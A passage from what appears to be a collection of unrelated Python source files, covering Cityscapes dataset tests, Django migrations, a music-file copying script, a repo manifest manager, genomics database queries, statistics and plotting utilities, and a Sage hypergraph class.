]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_with_no_subsets(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='defaultcity_1_2',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 0]]), label=0,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 1]]), label=3,
attributes={'is_crowd': True}),
]
),
DatasetItem(id='defaultcity_1_3',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 1, 0, 1, 0]]), label=1,
attributes={'is_crowd': True}),
Mask(np.array([[0, 0, 1, 0, 1]]), label=2,
attributes={'is_crowd': True}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_dataset_with_cyrillic_and_spaces_in_filename(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='кириллица с пробелом',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=24, id=1,
attributes={'is_crowd': False}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_with_relative_path_in_id(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='a/b/1', subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=24, id=1,
attributes={'is_crowd': False}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_can_save_with_no_masks(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='city_1_2', subset='test',
image=np.ones((2, 5, 3)),
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes',
save_images=True), test_dir)
@mark_requirement(Requirements.DATUM_267)
def test_dataset_with_source_labelmap_undefined(self):
source_dataset = Dataset.from_iterable([
DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=0),
Mask(np.array([[0, 1, 1, 0, 0]]), label=1),
]),
], categories=['a', 'b'])
class DstExtractor(TestExtractorBase):
def __iter__(self):
yield DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]),
attributes={'is_crowd': False}, id=1,
label=self._label('a')),
Mask(np.array([[0, 1, 1, 0, 0]]),
attributes={'is_crowd': False}, id=2,
label=self._label('b')),
])
def categories(self):
label_map = OrderedDict()
label_map['background'] = None
label_map['a'] = None
label_map['b'] = None
return Cityscapes.make_cityscapes_categories(label_map)
with TestDir() as test_dir:
self._test_save_and_load(source_dataset,
partial(CityscapesConverter.convert, label_map='source',
save_images=True), test_dir, target_dataset=DstExtractor())
@mark_requirement(Requirements.DATUM_267)
def test_dataset_with_source_labelmap_defined(self):
class SrcExtractor(TestExtractorBase):
def __iter__(self):
yield DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]), label=1, id=1,
attributes={'is_crowd': False}),
Mask(np.array([[0, 1, 1, 0, 0]]), label=2, id=2,
attributes={'is_crowd': False}),
])
def categories(self):
label_map = OrderedDict()
label_map['background'] = (0, 0, 0)
label_map['label_1'] = (1, 2, 3)
label_map['label_2'] = (3, 2, 1)
return Cityscapes.make_cityscapes_categories(label_map)
class DstExtractor(TestExtractorBase):
def __iter__(self):
yield DatasetItem(id=1, image=np.ones((1, 5, 3)), annotations=[
Mask(np.array([[1, 0, 0, 1, 1]]),
attributes={'is_crowd': False}, id=1,
label=self._label('label_1')),
Mask(np.array([[0, 1, 1, 0, 0]]),
attributes={'is_crowd': False}, id=2,
label=self._label('label_2')),
])
def categories(self):
label_map = OrderedDict()
label_map['background'] = (0, 0, 0)
label_map['label_1'] = (1, 2, 3)
label_map['label_2'] = (3, 2, 1)
return Cityscapes.make_cityscapes_categories(label_map)
with TestDir() as test_dir:
self._test_save_and_load(SrcExtractor(),
partial(CityscapesConverter.convert, label_map='source',
save_images=True), test_dir, target_dataset=DstExtractor())
@mark_requirement(Requirements.DATUM_267)
def test_can_save_and_load_image_with_arbitrary_extension(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='q',
image=Image(path='q.JPEG', data=np.zeros((4, 3, 3)))
),
DatasetItem(id='w',
image=Image(path='w.bmp', data=np.ones((1, 5, 3))),
annotations=[
Mask(np.array([[1, 0, 0, 1, 0]]), label=0,
attributes={'is_crowd': True}),
Mask(np.array([[0, 1, 1, 0, 1]]), label=1,
attributes={'is_crowd': True}),
]),
])
def categories(self):
label_map = OrderedDict()
label_map['a'] = None
label_map['b'] = None
return Cityscapes.make_cityscapes_categories(label_map)
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, save_images=True),
test_dir, require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_inplace_save_writes_only_updated_data(self):
src_mask_cat = MaskCategories.generate(2, include_background=False)
expected = Dataset.from_iterable([
DatasetItem(1, subset='a', image=np.ones((2, 1, 3)),
annotations=[
Mask(np.ones((2, 1)), label=2, id=1)
]),
DatasetItem(2, subset='a', image=np.ones((3, 2, 3))),
DatasetItem(2, subset='b', image=np.ones((2, 2, 3)),
annotations=[
Mask(np.ones((2, 2)), label=1, id=1)
]),
], categories=Cityscapes.make_cityscapes_categories(OrderedDict([
('a', src_mask_cat.colormap[0]),
('b', src_mask_cat.colormap[1]),
])))
with TestDir() as path:
dataset = Dataset.from_iterable([
DatasetItem(1, subset='a', image=np.ones((2, 1, 3)),
annotations=[
Mask(np.ones((2, 1)), label=1)
]),
DatasetItem(2, subset='b', image=np.ones((2, 2, 3)),
annotations=[
Mask(np.ones((2, 2)), label=0)
]),
DatasetItem(3, subset='c', image=np.ones((2, 3, 3)),
annotations=[
Mask(np.ones((2, 2)), label=0)
]),
], categories={
AnnotationType.label: LabelCategories.from_iterable(['a', 'b']),
AnnotationType.mask: src_mask_cat
})
dataset.export(path, 'cityscapes', save_images=True)
dataset.put(DatasetItem(2, subset='a', image=np.ones((3, 2, 3))))
dataset.remove(3, 'c')
dataset.save(save_images=True)
self.assertEqual({'a', 'b'},
set(os.listdir(osp.join(path, 'gtFine'))))
self.assertEqual({
'1_gtFine_color.png', '1_gtFine_instanceIds.png',
'1_gtFine_labelIds.png'
},
set(os.listdir(osp.join(path, 'gtFine', 'a'))))
self.assertEqual({
'2_gtFine_color.png', '2_gtFine_instanceIds.png',
'2_gtFine_labelIds.png'
},
set(os.listdir(osp.join(path, 'gtFine', 'b'))))
self.assertEqual({'a', 'b'},
set(os.listdir(osp.join(path, 'imgsFine', 'leftImg8bit'))))
self.assertEqual({'1_leftImg8bit.png', '2_leftImg8bit.png'},
set(os.listdir(osp.join(path, 'imgsFine', 'leftImg8bit', 'a'))))
self.assertEqual({'2_leftImg8bit.png'},
set(os.listdir(osp.join(path, 'imgsFine', 'leftImg8bit', 'b'))))
compare_datasets(self, expected,
Dataset.import_from(path, 'cityscapes'),
require_images=True, ignored_attrs=IGNORE_ALL)
@mark_requirement(Requirements.DATUM_BUG_470)
def test_can_save_and_load_without_image_saving(self):
class TestExtractor(TestExtractorBase):
def __iter__(self):
return iter([
DatasetItem(id='a', subset='test',
image=np.ones((1, 5, 3)),
annotations=[
Mask(np.array([[0, 1, 1, 1, 0]]), label=3,
attributes={'is_crowd': True}),
Mask(np.array([[1, 0, 0, 0, 1]]), label=4,
attributes={'is_crowd': True}),
]
),
])
with TestDir() as test_dir:
self._test_save_and_load(TestExtractor(),
partial(CityscapesConverter.convert, label_map='cityscapes'),
test_dir
)
|
python
|
"""
Django 1.10.5 doesn't support migrations/updates for fulltext fields, django-pg-fts isn't
actively maintained and current codebase is broken between various versions of Django.
Because of that I decided to implement our migrations with intent to drop it when django develops
its own solution.
"""
import copy
from django.db.migrations.operations.base import Operation
class BaseSQL(Operation):
"""
Allows to create parameterized sql migrations.
"""
forward_sql = None
backward_sql = None
sql_opts = {}
@property
def sql(self):
return self.forward_sql.format(**self.sql_opts)
@property
def reverse_sql(self):
return self.backward_sql.format(**self.sql_opts)
def __init__(self, **kwargs):
sql_opts = copy.copy(self.sql_opts)
sql_opts.update(kwargs)
self.sql_opts = sql_opts
def database_forwards(self, app_label, schema_editor, from_state, to_state):
schema_editor.execute(self.sql)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
schema_editor.execute(self.reverse_sql)
def state_forwards(self, app_label, state):
pass
class GINIndex(BaseSQL):
"""
RunIndex operations share some parts like e.g. drop of an index.
"""
forward_sql = """
CREATE INDEX {table}_{field}_{index_suffix} ON \"{table}\"
USING GIN({expression} {index_opts})
"""
backward_sql = """
DROP INDEX {table}_{field}_{index_suffix}
"""
sql_opts = {
"index_opts": "",
}
class MultiFieldTRGMIndex(GINIndex):
"""
Create a gin-based trigram index on a set of fields.
"""
sql_opts = {"index_opts": "", "index_suffix": "trigram_index"}
@property
def sql(self):
def index_field(field_name):
return f"UPPER({field_name}) gin_trgm_ops"
self.sql_opts["expression"] = ",".join(
map(index_field, self.sql_opts["from_fields"])
)
return self.forward_sql.format(**self.sql_opts)
|
python
|
import os
import argparse
import shutil
from datetime import datetime,timedelta
def main():
'''
the driver
'''
args = parse()
files = get_files(args)
if confirm(files):
copy_files(files,args)
def parse():
'''
sets the args needed to run and returns them
'''
#defaults
timestamp = datetime.now().strftime("%Y%m%dT%H%M%S")
output_root_default = f"./out/recent_{timestamp}/"
parser = argparse.ArgumentParser(description='Creates copies of recently changed files or directories and places them in a local directory with the same folder structure')
parser.add_argument('-d','--directory',dest='dir',type=str, required=True, help='the directory to find files in')
parser.add_argument('-t','--timespan','--days', dest='timespan', required=True, help='number of days prior to the current date to search for')
parser.add_argument('-o','--output', dest='output_root',default=output_root_default, help=f"output path (optional, defaults to {output_root_default})")
args = parser.parse_args()
#standardize directory
args.dir = os.path.expanduser(args.dir) if args.dir.startswith('~') else os.path.abspath(args.dir)
#calculate the min date to search for
args.threshold = datetime.today() - timedelta(days=int(args.timespan))
return args
def get_files(args):
'''
gets the array of files to partition
'''
directory = args.dir
threshold = args.threshold
print(f'walking {directory}')
found = []
for root,_,files in os.walk(directory):
for f in files:
path = os.path.join(root, f)
if(is_music(path) and is_recent(path,threshold)):
found.append(path)
return found
def is_recent(f,threshold_date):
"""
returns if modified date >= threshold date
"""
modified_date = datetime.fromtimestamp(os.path.getmtime(f))
return modified_date >= threshold_date
def is_music(f):
"""
returns if path, f, is a music file
"""
music_exts = ['3gp','aa','aac','aax','act','aiff','alac','amr','ape','au','awb','dct','dss','dsd','dsf','dvf','flac','gsm','iklax','ivs','m4a','m4b','m4p','mmf','mp3','mpc','msv','nmf','ogg,','opus','ra,','raw','rf64','sln','tta','voc','vox','wav','wma','wv','webm','8svx','cda']
return f.split('.')[-1] in music_exts
def copy_files(sources, args):
'''
copies files from directory to output
'''
directory = args.dir
output_root = args.output_root
os.makedirs(os.path.abspath(output_root),exist_ok=True)
for file in sources:
relpath = get_path_relroot(file,directory)
newpath = os.path.abspath(os.path.join(output_root,relpath))
os.makedirs(os.path.dirname(newpath),exist_ok=True)
shutil.copy(file,newpath)
def confirm(files):
'''
displays info and asks for confirm
'''
if len(files) == 0:
print('No files found. Exiting.')
exit()
totalsize = sum([os.path.getsize(f) for f in files])/1.0e6
print("Found {0} file(s) totalling {1:.2f}MB".format(len(files),totalsize))
print('Proceed with copying? (Y/n)')
choice = input()
return choice.upper() == 'Y'
def get_path_relroot(path,root):
'''
remove the root folder path we supplied earlier
this is quick and dirty
'''
return path.replace(root,'').strip(os.sep)
if __name__== "__main__": main()
|
python
|
import yaml
from pathlib import Path
from .repo import serialize_repo, deserialize_repo
from .validation import validate_manifest
from ..exception import AppException
from ..env import MANIFEST_PATH_DEFAULT
from ..logger import get_logger
from ..utils import to_absolute_path, validate_writable_directory
def serialize_manifest(raw_manifest):
get_logger().info("Serializing manifest changes")
for repo in raw_manifest["repos"]:
repo = serialize_repo(repo)
return raw_manifest
def deserialize_manifest(raw_manifest):
get_logger().info("Deserializing manifest changes")
for repo in raw_manifest["repos"]:
repo = deserialize_repo(repo)
return raw_manifest
EMPTY_MANIFEST = {"repos": []}
def load_manifest(manifest_path):
get_logger().info("Loading manifest")
if manifest_path.exists():
with open(manifest_path) as f:
data = f.read()
data = yaml.safe_load(data) if data.strip() else EMPTY_MANIFEST
data = validate_manifest(data)
return deserialize_manifest(data)
get_logger().info("Manifest not specified, using default manifest")
default_manifest_directory = to_absolute_path(Path(MANIFEST_PATH_DEFAULT)).parent
if not default_manifest_directory.exists():
get_logger().warning(
f'Default directory "{default_manifest_directory}" not found, creating'
)
default_manifest_directory.mkdir(parents=True)
parent_path = manifest_path.parent
validation_error = validate_writable_directory(parent_path)
if validation_error:
raise AppException(validation_error)
return EMPTY_MANIFEST
def save_manifest(manifest_path, manifest):
get_logger().info("Saving manifest")
with open(manifest_path, "w") as f:
f.write(yaml.dump(serialize_manifest(manifest)))
def update(manifest, repo_location, *, repo_remotes=None, default_fetch_remote=None):
found_repo = None
for repo in manifest["repos"]:
if repo["location"] == repo_location:
found_repo = repo
if not found_repo:
raise AppException(f'Path "{repo_location}" is not a registered repo')
if repo_remotes:
found_repo["remotes"] = repo_remotes
if default_fetch_remote:
found_repo["default_fetch_remote"] = default_fetch_remote
return manifest
def add_repo(manifest, new_repo, force):
get_logger().info(f'Adding repository from "{new_repo["location"]}"')
should_overwrite_repos = False
location = new_repo["location"]
for repo in manifest["repos"]:
if repo["location"] == location:
if force:
get_logger().warning(
f'Repository located at "{location}" already found, overwriting'
)
should_overwrite_repos = True
break
else:
raise AppException(f'Path "{location}" is already registered repo')
if should_overwrite_repos:
return update(
manifest,
location,
repo_remotes=new_repo["remotes"],
default_fetch_remote=new_repo.get("default_fetch_remote"),
)
manifest["repos"].append(new_repo)
return manifest
def remove_repo(manifest, repo_location, force):
get_logger().info(f'Removing repository from "{repo_location}"')
original_length = len(manifest["repos"])
manifest["repos"] = [
repo for repo in manifest["repos"] if repo["location"] != repo_location
]
if original_length == len(manifest["repos"]):
message = f'Repo "{repo_location}" not found in the manifest'
if force:
get_logger().warning(message)
else:
raise AppException(message)
return manifest
|
python
|
import logging
import sqlite3
from phizz.database import get_cursor
from . import GENE_DB
logger = logging.getLogger(__name__)
def query_hpo(hpo_terms, database=None, connection=None):
"""Query with hpo terms
If no databse is given use the one that follows with package
Args:
hpo_terms (iterator): An iterator with hpo terms
database (str): Path to database
Returns:
answer (list): A list of dictionaries where each dictionary
represents a hpo term on the form {'hpo_term': <hpo_term>,
'description':<description>}
"""
cursor = get_cursor(
path_to_database=database,
connection=connection
)
answer = []
for hpo_term in hpo_terms:
try:
hpo_term = int(hpo_term.lstrip('HP:'))
except ValueError as e:
logger.error("{0} is not a valid HPO term".format(hpo_term))
raise e
hpo_result = cursor.execute("SELECT * FROM hpo"\
" WHERE hpo_id = '{0}'".format(hpo_term)).fetchall()
for row in hpo_result:
answer.append({
'hpo_term': row['name'],
'description': row['description']
})
return answer
def query_disease(disease_terms, database=None, connection=None):
"""Query with diseae terms
If no databse is given use the one that follows with package
Args:
hpo_terms (iterator): An iterator with hpo terms
database (str): Path to database
Returns:
answer (list): A list of dictionaries where each dictionary
represents a hpo term on the form {'hpo_term': <hpo_term>,
'description':<description>}
"""
cursor = get_cursor(
path_to_database=database,
connection=connection
)
answer = []
for disease_term in disease_terms:
try:
disease_term = int(disease_term.lstrip('OMIM:'))
logger.debug("Querying diseases with {0}".format(disease_term))
except ValueError as e:
logger.error("{0} is not a valid OMIM term".format(disease_term))
raise e
result = cursor.execute("SELECT hpo.name, hpo.description"\
" FROM hpo, disease WHERE"\
" hpo.hpo_id = disease.mim_hpo"\
" AND disease.mim_nr = ?", (str(disease_term),)).fetchall()
for hpo_row in result:
answer.append({
'hpo_term': hpo_row['name'],
'description': hpo_row['description']
})
return answer
def query_gene(ensembl_id=None, hgnc_symbol=None, database=None, connection=None):
"""Query with gene symbols, either hgnc or ensembl
If no database is given use the one that follows with package
Args:
ensemb_id (str): A ensembl gene id
hgnc_symbol (str): A hgnc symbol
database (str): Path to database
Returns:
answer (iterator)
"""
cursor = get_cursor(
path_to_database=database,
connection=connection
)
result = []
if not (ensembl_id or hgnc_symbol):
raise SyntaxError("Use gene identifier to query")
if ensembl_id:
if not ensembl_id.startswith("ENSG"):
raise ValueError("invalid format for ensemb id")
logger.debug("Querying genes with ensembl id {0}".format(ensembl_id))
result = cursor.execute("SELECT * FROM gene WHERE"\
" ensembl_id = ?" , (ensembl_id,)).fetchall()
else:
logger.debug("Querying genes with hgnc symbol {0}".format(hgnc_symbol))
result = cursor.execute("SELECT * FROM gene WHERE"\
" hgnc_symbol = ?" , (hgnc_symbol,)).fetchall()
return result
def query_gene_symbol(chrom, start, stop):
"""Query the gene trees with an interval and return the gene symbols overlapped
Args:
chrom(str)
start(int)
stop(int)
Returns:
gene_symbols(list(str))
"""
logger.info("Querying gene trees with chrom: {0}, start:{1}, stop{2}".format(
chrom, start, stop
))
chrom = chrom.rstrip('chrCHR')
interval = [int(start), int(stop)]
gene_symbols = set()
try:
gene_tree = GENE_DB[chrom]
gene_symbols = gene_tree.find_range(interval)
except KeyError:
logger.warning("Chromosome {0} is not in annotation file".format(chrom))
return gene_symbols
|
python
|
import numpy as np
def gaussian_KL(mu0, Sig0, mu1, Sig1inv):
t1 = np.dot(Sig1inv, Sig0).trace()
t2 = np.dot((mu1-mu0),np.dot(Sig1inv, mu1-mu0))
t3 = -np.linalg.slogdet(Sig1inv)[1] - np.linalg.slogdet(Sig0)[1]
return 0.5*(t1+t2+t3-mu0.shape[0])
def weighted_post_KL(th0, Sig0inv, sigsq, X, Y, w, reverse=True):
muw, Sigw = weighted_post(th0, Sig0inv, sigsq, X, Y, w)
mup, Sigp = weighted_post(th0, Sig0inv, sigsq, X, Y, np.ones(X.shape[0]))
if reverse:
return gaussian_KL(muw, Sigw, mup, np.linalg.inv(Sigp))
else:
return gaussian_KL(mup, Sigp, muw, np.linalg.inv(Sigw))
def weighted_post(th0, Sig0inv, sigsq, X, Y, w):
Sigp = np.linalg.inv(Sig0inv + (w[:, np.newaxis]*X).T.dot(X)/sigsq)
mup = np.dot(Sigp, np.dot(Sig0inv,th0) + (w[:, np.newaxis]*Y[:,np.newaxis]*X).sum(axis=0)/sigsq )
return mup, Sigp
def potentials(sigsq, X, Y, samples):
XST = X.dot(samples.T)
return -1./2.*np.log(2.*np.pi*sigsq) - 1./(2.*sigsq)*(Y[:,np.newaxis]**2 - 2*XST*Y[:,np.newaxis] + XST**2)
|
python
|
# <editor-fold desc="Description">
x = 'foo' + 'bar'
# </editor-fold>
|
python
|
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sb
from utils.data_handling import load_config
def get_colors():
cfg = load_config()
sb.set_style(cfg['plotting']['seaborn']['style'])
sb.set_context(cfg['plotting']['seaborn']['context']['context'],
font_scale=cfg['plotting']['seaborn']['context']['font scale'],
rc=cfg['plotting']['seaborn']['context']['rc'])
colors = list(sb.color_palette(cfg['plotting']['palette']))
color_map = cfg['plotting']['color_map']
return colors, color_map
def plot_lens(ax, methods, lens, steps_per_ep, title, episodes=50_000,
log=False, logx=False, eval_steps=1):
colors, color_map = get_colors()
print('AVG pol length')
mv = 0
created_steps_leg = False
for method in methods:
if method != 'hq':
m, s = lens[method].mean(axis=0), lens[method].std(axis=0)
total_ones = np.ones(m.shape) * 100
# print("{:>4s}: {:>5.2f}".format(method, 1 - np.sum(total_ones - m) / np.sum(total_ones)))
print("{:>4s}: {:>5.2f}".format(method, np.mean(m)))
ax.step(np.arange(1, m.shape[0] + 1) * eval_steps, m, where='post',
c=colors[color_map[method]])
ax.fill_between(
np.arange(1, m.shape[0] + 1) * eval_steps, m - s, m + s, alpha=0.25, step='post',
color=colors[color_map[method]])
if 'hq' not in methods:
mv = max(mv, max(m) + max(m) * .05)
else:
raise NotImplementedError
if steps_per_ep:
m, s = steps_per_ep[method].mean(axis=0), steps_per_ep[method].std(axis=0)
ax.step(np.arange(1, m.shape[0] + 1) * eval_steps, m, where='post',
c=np.array(colors[color_map[method]]) * .75, ls=':')
ax.fill_between(
np.arange(1, m.shape[0] + 1) * eval_steps, m - s, m + s, alpha=0.125, step='post',
color=np.array(colors[color_map[method]]) * .75)
mv = max(mv, max(m))
if not created_steps_leg:
ax.plot([-999, -999], [-999, -999], ls=':', c='k', label='all')
ax.plot([-999, -999], [-999, -999], ls='-', c='k', label='dec')
created_steps_leg = True
if log:
ax.set_ylim([1, max(mv, 100)])
ax.semilogy()
else:
ax.set_ylim([0, mv])
if logx:
ax.set_ylim([1, max(mv, 100)])
ax.set_xlim([1, episodes * eval_steps])
ax.semilogx()
else:
ax.set_xlim([0, episodes * eval_steps])
ax.set_ylabel('#Steps')
if steps_per_ep:
ax.legend(loc='upper right', ncol=1, handlelength=.75)
ax.set_ylabel('#Steps')
ax.set_xlabel('#Episodes')
ax.set_title(title)
return ax
def _annotate(ax, rewards, max_reward, eval_steps):
qxy = ((np.where(rewards['q'].mean(axis=0) >= .5 * max_reward)[0])[0] * eval_steps, .5)
sqvxy = ((np.where(rewards['sq'].mean(axis=0) >= .5 * max_reward)[0])[0] * eval_steps, .5)
ax.annotate("", # '{:d}x speedup'.format(int(np.round(qxy[0]/sqvxy[0]))),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="<->", color="0.",
connectionstyle="arc3,rad=0.", lw=5,
), )
speedup = qxy[0] / sqvxy[0]
qxy = (qxy[0], .5 * max_reward)
sqvxy = (sqvxy[0], .25)
ax.annotate(r'${:.2f}\times$ speedup'.format(speedup),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="-", color="0.",
connectionstyle="arc3,rad=0.", lw=0
),
fontsize=22)
try:
qxy = ((np.where(rewards['q'].mean(axis=0) >= max_reward)[0])[0] * eval_steps, max_reward)
sqvxy = ((np.where(rewards['sq'].mean(axis=0) >= max_reward)[0])[0] * eval_steps, max_reward)
ax.annotate("", # '{:d}x speedup'.format(int(np.round(qxy[0]/sqvxy[0]))),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="<->", color="0.",
connectionstyle="arc3,rad=0.", lw=5,
), )
speedup = qxy[0] / sqvxy[0]
qxy = (qxy[0], max_reward)
sqvxy = (sqvxy[0], .75)
ax.annotate(r'${:.2f}\times$ speedup'.format(speedup),
xy=qxy,
xycoords='data', xytext=sqvxy, textcoords='data',
arrowprops=dict(arrowstyle="-", color="0.",
connectionstyle="arc3,rad=0.", lw=0
),
fontsize=22)
except:
pass
def plot_rewards(ax, methods, rewards, title, episodes=50_000,
xlabel='#Episodes', log=False, logx=False, annotate=False, eval_steps=1):
colors, color_map = get_colors()
print('AUC')
min_m = np.inf
max_m = -np.inf
for method in methods:
m, s = rewards[method].mean(axis=0), rewards[method].std(axis=0)
# used for AUC computation
m_, s_ = ((rewards[method] + 1) / 2).mean(axis=0), ((rewards[method] + 1) / 2).std(axis=0)
min_m = min(min(m), min_m)
max_m = max(max(m), max_m)
total_ones = np.ones(m.shape)
label = method
if method == 'sqv3':
label = "sn-$\mathcal{Q}$"
elif method == 'sq':
label = "t-$\mathcal{Q}$"
label = label.replace('q', '$\mathcal{Q}$')
label = r'{:s}'.format(label)
print("{:>2s}: {:>5.2f}".format(method, 1 - np.sum(total_ones - m_) / np.sum(total_ones)))
ax.step(np.arange(1, m.shape[0] + 1) * eval_steps, m, where='post', c=colors[color_map[method]],
label=label)
ax.fill_between(np.arange(1, m.shape[0] + 1) * eval_steps, m - s, m + s, alpha=0.25, step='post',
color=colors[color_map[method]])
if annotate:
_annotate(ax, rewards, max_m, eval_steps)
if log:
ax.set_ylim([.01, max_m])
ax.semilogy()
else:
ax.set_ylim([min_m - .1, max_m + .1])
if logx:
ax.set_xlim([1, episodes * eval_steps])
ax.semilogx()
else:
ax.set_xlim([0, episodes * eval_steps])
ax.set_ylabel('Reward')
ax.set_xlabel(xlabel)
ax.set_title(title)
ax.legend(ncol=1, loc='lower right', handlelength=.75)
return ax
def plot(methods, rewards, lens, steps_per_ep, title, episodes=50_000,
show=True, savefig=None, logleny=True,
logrewy=True, logx=False, annotate=False, eval_steps=1, horizontal=False,
individual=False):
_, _ = get_colors()
if not individual:
if horizontal:
fig, ax = plt.subplots(1, 2, figsize=(32, 5), dpi=100)
else:
fig, ax = plt.subplots(2, figsize=(20, 10), dpi=100)
ax[0] = plot_rewards(ax[0], methods, rewards, title, episodes,
xlabel='#Episodes' if horizontal else '',
log=logrewy, logx=logx, annotate=annotate, eval_steps=eval_steps)
print()
ax[1] = plot_lens(ax[1], methods, lens, steps_per_ep, '', episodes, log=logleny,
logx=logx, eval_steps=eval_steps)
if savefig:
plt.savefig(savefig, dpi=100)
if show:
plt.show()
else:
try:
name, suffix = savefig.split('.')
except:
name = savefig
suffix = '.pdf'
fig, ax = plt.subplots(1, figsize=(10, 4), dpi=100)
ax = plot_rewards(ax, methods, rewards, '', episodes,
xlabel='#Episodes',
log=logrewy, logx=logx, annotate=annotate, eval_steps=eval_steps)
plt.tight_layout()
if savefig:
plt.savefig(name + '_rewards' + '.' + suffix, dpi=100)
if show:
plt.show()
fig, ax = plt.subplots(1, figsize=(10, 4), dpi=100)
ax = plot_lens(ax, methods, lens, steps_per_ep, '', episodes, log=logleny,
logx=logx, eval_steps=eval_steps)
plt.tight_layout()
if savefig:
plt.savefig(name + '_lens' + '.' + suffix, dpi=100)
if show:
plt.show()
|
python
|
# -*- coding: utf-8 -*-
"""
Created on 2021/1/12 16:51
@author: Irvinfaith
@email: [email protected]
"""
|
python
|
# Generated by Django 3.1.4 on 2020-12-12 22:01
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("peeringdb", "0014_auto_20201208_1856"),
("peering", "0065_auto_20201025_2137"),
]
operations = [
migrations.RemoveField(
model_name="autonomoussystem",
name="potential_internet_exchange_peering_sessions",
),
migrations.RemoveField(
model_name="internetexchange",
name="peeringdb_id",
),
migrations.AddField(
model_name="internetexchange",
name="peeringdb_ix",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="peeringdb.internetexchange",
),
),
migrations.AddField(
model_name="internetexchange",
name="peeringdb_netixlan",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="peeringdb.networkixlan",
),
),
]
|
python
|
r"""
Hypergraphs
This module consists in a very basic implementation of :class:`Hypergraph`,
whose only current purpose is to provide method to visualize them. This is
done at the moment through `\LaTeX` and TikZ, and can be obtained from Sage
through the ``view`` command::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
sage: view(H) # not tested
Note that hypergraphs are very hard to visualize, and unless it is very small
(`\leq 10` sets) or has a very specific structure (like the following one),
Sage's drawing will only bring more confusion::
sage: g = graphs.Grid2dGraph(5,5)
sage: sets = Set(map(Set,list(g.subgraph_search_iterator(graphs.CycleGraph(4)))))
sage: H = Hypergraph(sets)
sage: view(H) # not tested
.. SEEALSO::
:class:`Hypergraph` for information on the `\LaTeX` output
Classes and methods
-------------------
"""
from sage.misc.latex import latex
from sage.sets.set import Set
class Hypergraph:
r"""
A hypergraph.
A *hypergraph* `H = (V, E)` is a set of vertices `V` and a collection `E` of
sets of vertices called *hyperedges* or edges. In particular `E \subseteq
\mathcal{P}(V)`. If all (hyper)edges contain exactly 2 vertices, then `H` is
a graph in the usual sense.
.. rubric:: Latex output
The `\LaTeX` for a hypergraph `H` is consists of the vertices set and a
set of closed curves. The set of vertices in each closed curve represents a
hyperedge of `H`. A vertex which is encircled by a curve but is not
located on its boundary is **NOT** included in the corresponding set.
The colors are picked for readability and have no other meaning.
INPUT:
- ``sets`` -- A list of hyperedges
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{6}]); H
Hypergraph on 6 vertices containing 4 sets
REFERENCES:
- :wikipedia:`Hypergraph`
"""
def __init__(self, sets):
r"""
Constructor
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
"""
from sage.sets.set import Set
self._sets = map(Set, sets)
self._domain = set([])
for s in sets:
for i in s:
self._domain.add(i)
def __repr__(self):
r"""
Short description of ``self``.
EXAMPLES::
sage: H = Hypergraph([{1,2,3},{2,3,4},{3,4,5},{4,5,6}]); H
Hypergraph on 6 vertices containing 4 sets
"""
return ("Hypergraph on "+str(len(self.domain()))+" "
"vertices containing "+str(len(self._sets))+" sets")
def edge_coloring(self):
r"""
Compute a proper edge-coloring.
A proper edge-coloring is an assignment of colors to the sets of the
hypergraph such that two sets with non-empty intersection receive
different colors. The coloring returned minimizes the number of colors.
